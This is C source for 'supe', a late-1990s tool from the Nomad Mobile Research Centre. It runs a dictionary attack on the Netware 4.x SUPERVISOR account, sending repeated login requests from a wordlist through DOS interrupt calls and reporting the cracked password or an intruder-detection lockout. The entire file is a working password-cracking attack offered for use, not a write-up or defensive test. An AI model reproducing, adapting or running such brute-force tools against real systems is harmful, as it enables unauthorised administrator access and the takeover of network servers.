/*************************************************************************
 *                                                                       *
 * supe1.c    - Attacks Supervisor account on Netware 4.1                *
 *                                                                       *
 * Programmer - Simple Nomad - Nomad Mobile Research Centre              *
 *              Crypto routines by itsme@xs4all.nl                       *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 07/01/97     - Initial Revision                                       *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 11/12/97     - Speed improvements.                                    *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 2/11/98      - Header file support.                                   *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 2/12/98      - Moved code around so that a session key request was    *
 *                not asked for every attempt as only one is needed.     *
 *                                                                       *
 *-----------------------------------------------------------------------*
 *                                                                       *
 * 2/13/98      - Decided to go for more speed and eliminated most code, *
 *                including the crypto stuff. Straight Netware login     *
 *                stuff.                                                 *
 *                                                                       *
 *************************************************************************/

/* Note - there is a distinct possibility that this code might fail if
   launched against a 4.1 server and it connects with a connection ID
   greater than 250. I had no way to test this. */

/*
 * Includes
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dos.h>
#include "globals.h"

/*
 * Global constants
 */
#define MAXPWLEN 64
#define MAXNAMELEN 48

/*
 * Password testing routines
 */

int shreq(int f, uint8 *req, int rl, uint8 *ans, int al)
{
  struct REGPACK r;
  r.r_cx=rl;
  r.r_dx=al;
  r.r_si=FP_OFF(req);
  r.r_di=FP_OFF(ans);
  r.r_ds=FP_SEG(req);
  r.r_es=FP_SEG(ans);
  r.r_ax=0xf200|f;
  intr(0x21,&r);
  return(r.r_ax&0xff);
}

int trypw(char *pw, int type, char *name)
{
  uint8 req[7+MAXNAMELEN+MAXPWLEN];
  req[2]=0x3f;
  *(int *)(req+3)=type;
  req[5]=strlen(name);
  strncpy((char *)req+6,name,MAXNAMELEN);
  req[6+req[5]]=strlen(pw);
  strncpy((char *)req+7+req[5],pw,MAXPWLEN);
  req[0]=0;
  req[1]=5+req[5]+req[6+req[5]];
  return(shreq(0x17,req,req[1]+2,req,0));
}

/*
 * print usage if needed
 */
void printHelp(int j)
{
   printf("USAGE: supe -w filename <options>\n");
   printf("  -h            This HELP screen\n");
   printf("  -w <filename> Use this WORDLIST.\n");
   printf("  -v            VERBOSE to show progress and beep.\n\n");
   printf("EXAMPLE:\n");
   printf("  supe -w biglist.wrd\n\n");
   exit(j);
}

/*
 * Main prog...
 */
void main(int argc, char **argv)
{
   FILE *dict;
   int i,FOUND,verbose;
   char *words,*readaword,*wordlist;

   wordlist = calloc(sizeof(wordlist), 1);
   readaword = calloc(sizeof(readaword), 1);
   words = calloc(sizeof(words), 1);

   /* say hello... */
   printf("SUPE - Netware 4.x dictionary Supervisor attacker\n");
   printf("Comments/bugs: pandora@nmrc.org\n");
   printf("http://www.nmrc.org/pandora\n");
   printf("1997,1998 (c) Nomad Mobile Research Centre\n\n");

   if (argc<2) printHelp(-1);

   /* process command line */
   for (i=1 ; i<argc ; i++)
   {
      if (argv[i][0]=='-')
	 switch(argv[i][1])
	 {
	    case 'w':
	    case 'W':
	       if ((i+1>argc) || argv[i+1][0]=='-')
	       {
		  printf("No argument given for option -w\n");
		  printHelp(-1);
	       }
	       sprintf(wordlist,"%s",argv[i+1]);
	       break;
            case 'h':
            case 'H':
            case '?':
               printHelp(0);
	    case 'v':
	    case 'V':
	       verbose=TRUE;
	       break;
	    default:
	       printf("Invalid option: %s\n", argv[i]);
	       printHelp(-1);
	 }
   }

   /* was a dictionary given? */
   if (wordlist==NULL) printHelp(2);

   /* open the dictionary */
   dict=fopen(wordlist, "r");
   if (dict==NULL)
   {
     printf("Unable to open %s\n",wordlist);
     exit(1);
   }

   /* the crack loop -- break out if done or the password found */
   while (!feof(dict))
   {
     fgets(readaword, 80, dict);
     sscanf(readaword,"%s%*c",words);
     for (i=0;i<strlen(words);i++)
       words[i]=toupper(words[i]); /* convert lower case letters
					to upper case letters */
     if (verbose==TRUE)
     {
      printf("%s\n",words);
     }
     FOUND=trypw(words,0x100,"SUPERVISOR");
     if (FOUND==0x00) break;
     if (FOUND==0xc5)
     {
      if (verbose==TRUE)
      {
       printf("\a");
      }
      printf("\n ** Intruder Detection active and Supe is now locked out. **\n\n");
      exit(3);
     }
   };

   if (dict) fclose(dict);

   /* print it if we found it, otherwise give the bad news */
   if (FOUND==0x00)
     printf("\a\n ** Supe's password is %s **\n\n",words);
   else
     printf("Supe's password not found.\n\n");
} 
